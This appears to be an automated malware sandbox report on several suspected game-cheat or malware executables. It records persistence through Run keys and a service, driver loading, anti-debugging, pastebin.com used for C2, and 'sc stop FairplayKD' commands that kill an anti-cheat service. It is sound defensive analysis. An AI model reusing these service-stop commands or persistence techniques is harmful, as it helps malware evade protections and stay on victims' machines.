SHA512 06620017cce06bafb40ba7d0c4e36323f8b0fbfb5113d7dfe5e6d967ddf14eb109c928d84051b0947bc2600a098b0fbc77e6a43e5bdc9b40ce16b5885ac273d9

C:\Program Files\Java\jdk-1.8\bin\jar.exe

MD5 609b55100b8d74d5afb7b309bdbb6303
SHA1 7cb24a21b7b01afc39eb5c57f3034afcc93de8fe
SHA256 41e2b1876688a141395212d716cda956c70a2605843ff8c71b0bcb0e3370feff
SHA512 cb6cadf9280660a48a97641e4e9c223cf1f702a74ae2f84583d1da3a757fcac7453ed767479cabc29d07af3899714e09c5a56239c42ae2bacbb46b518ab7e154

C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe

MD5 c5e963321a29f832859ad55ab323a284
SHA1 0fb48465cc0287ec93fbe8843af7ea165980f0cc
SHA256 26862edc468906af6fcb77061a25f88512dc97f7f096561517da9c026cafe719
SHA512 7a31b6ba0f5ebf87ab88874fba1df74d3556d3c95d0863dc4773e931f84a369c188d34a9ca02c5dc82ee2c3ec2ab83fce21decc78f4c55b7d75277d54a38f2da

C:\Program Files\Java\jdk-1.8\bin\idlj.exe

MD5 07ad3925ec9619fb50ed3e594b41cb8a
SHA1 e5f8e015cf135737491213199adfe97f23edf87d
SHA256 222be3c7431aeeac204bf08ac2757af666d71a53dcb5359ad3f277e2f53a7d82
SHA512 7d0e222b2ca2c29f7bf53001418b18b82923b372838b3de9021b217427e885455bef2a1105e460787d46c4c68aa7482a5d22caac57b863583e08cb917f51756a

C:\Program Files\Java\jdk-1.8\bin\extcheck.exe

MD5 cc638206ac38c4e63c22a891e67ec753
SHA1 ff0924b48d970c982a78c6c9b8b39d2131ea7542
SHA256 a9532e5122d64935f4681d8a44b8d60b308f2c749381e05c73e58d47688706bc
SHA512 85292baf9c08d531b4958b99a918f045a97d2cc6767d83cd26d406082d63d6cf46536b5331935e09878c3fb67e721649caefcff33a1b4ac4935dbd3bdde46d56

C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe

MD5 c8ee84c55ef71ed9e32cce1465766723
SHA1 385cfa41b48e86db9ec906245bc1806ceb8334ef
SHA256 be7670eeb8c9e02d1fa09d63b4057a89c376af9820aa1081a0c418f037cd4725
SHA512 d8ef4943859c5f9961e75542bf537d4ab8e817feb34ae921e59b7a48eae06a2007e1106e55d4f672025694a64a6046996998525ffd4450c2e175b4157e06629f

memory/564-520-0x0000000140000000-0x0000000140164000-memory.dmp

memory/2216-529-0x0000000140000000-0x0000000140179000-memory.dmp

memory/1816-686-0x0000000140000000-0x0000000140234000-memory.dmp

memory/3712-689-0x0000000140000000-0x000000014022B000-memory.dmp

memory/2272-694-0x0000000140000000-0x000000014015F000-memory.dmp

memory/1736-708-0x0000000140000000-0x0000000140149000-memory.dmp

memory/332-721-0x0000000140000000-0x0000000140134000-memory.dmp

memory/648-726-0x0000000140000000-0x00000001401A1000-memory.dmp

memory/2464-729-0x0000000140000000-0x0000000140169000-memory.dmp

memory/2272-751-0x0000000140000000-0x000000014015F000-memory.dmp

memory/1736-752-0x0000000140000000-0x0000000140149000-memory.dmp

memory/2464-753-0x0000000140000000-0x0000000140169000-memory.dmp

memory/2988-756-0x0000000140000000-0x0000000140179000-memory.dmp

C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.jfm

MD5 9841dde4f7291968b910482121f5e634
SHA1 9da8e7a5ef97c0bb306058c8479bfc06cbe010b1
SHA256 a997a8bcd20492be055f574a9be328ff2b638c90b380fd39589b3e1c1859705d
SHA512 bf8a11d00824ed1dd8b5b9bcb8fa1462a354ab57877670b6f5fda6d88cbcb8cb0e68eca5648748f091472cbfbf7ef2cb04bbf98ab08e3cc3d2203d2e66868876

memory/2988-825-0x0000000140000000-0x0000000140179000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

95s

Max time network

162s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe"

Signatures

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\YuYWieTYcCRlVDzFkxU\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\YuYWieTYcCRlVDzFkxU" C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\0000000r00d000r3.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

memory/3356-0-0x00007FF64FB6D000-0x00007FF64FDF6000-memory.dmp

memory/3356-1-0x00007FFEAC830000-0x00007FFEAC832000-memory.dmp

memory/3356-2-0x00007FF64FA40000-0x00007FF6502DF000-memory.dmp

memory/3356-7-0x00007FF64FB6D000-0x00007FF64FDF6000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

91s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe"

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DragonSafe.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/5020-0-0x00007FF7405B9000-0x00007FF740923000-memory.dmp

memory/5020-1-0x00007FF837270000-0x00007FF837272000-memory.dmp

memory/5020-2-0x00007FF837280000-0x00007FF837282000-memory.dmp

memory/5020-4-0x00007FF7405B0000-0x00007FF740E63000-memory.dmp

memory/5020-5-0x00007FF7405B9000-0x00007FF740923000-memory.dmp

memory/5020-6-0x00007FF7405B0000-0x00007FF740E63000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

150s

Max time network

165s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe"

Signatures

Stops running service(s)

evasion execution

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1204 wrote to memory of 356 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 356 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 356 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe C:\Windows\SysWOW64\cmd.exe
PID 356 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 356 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 356 wrote to memory of 2792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1204 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe C:\Windows\SysWOW64\cmd.exe
PID 548 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 548 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 548 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1204 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe C:\Windows\SysWOW64\cmd.exe
PID 3940 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3940 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3940 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1204 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 4844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2972 wrote to memory of 4844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2972 wrote to memory of 4844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Launcher_.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop FairplayKD > nul

C:\Windows\SysWOW64\sc.exe

sc stop FairplayKD

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop FairplayKD1 > nul

C:\Windows\SysWOW64\sc.exe

sc stop FairplayKD1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop FairplayKD2 > nul

C:\Windows\SysWOW64\sc.exe

sc stop FairplayKD2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop FairplayKD3 > nul

C:\Windows\SysWOW64\sc.exe

sc stop FairplayKD3

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 216.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

memory/1204-1-0x00000000016D0000-0x00000000016D1000-memory.dmp

memory/1204-0-0x000000000063A000-0x0000000000BB1000-memory.dmp

memory/1204-2-0x0000000000400000-0x000000000168B000-memory.dmp

memory/1204-4-0x0000000000400000-0x000000000168B000-memory.dmp

memory/1204-5-0x000000000063A000-0x0000000000BB1000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

150s

Max time network

156s

Command Line

winlogon.exe

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1300 created 628 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System32\$Node32.exe N/A
N/A N/A C:\Windows\System32\$Node2Json.exe N/A
N/A N/A C:\Windows\System32\$Node3Json.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe" C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe" C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe" C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\$Node2Json.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe N/A
File opened for modification C:\Windows\System32\$Node3Json.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\System32\$Node32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe N/A
File created C:\Windows\System32\$Node2Json.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\$Node32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe N/A
File created C:\Windows\System32\$Node3Json.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1300 set thread context of 324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\System32\$Node32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
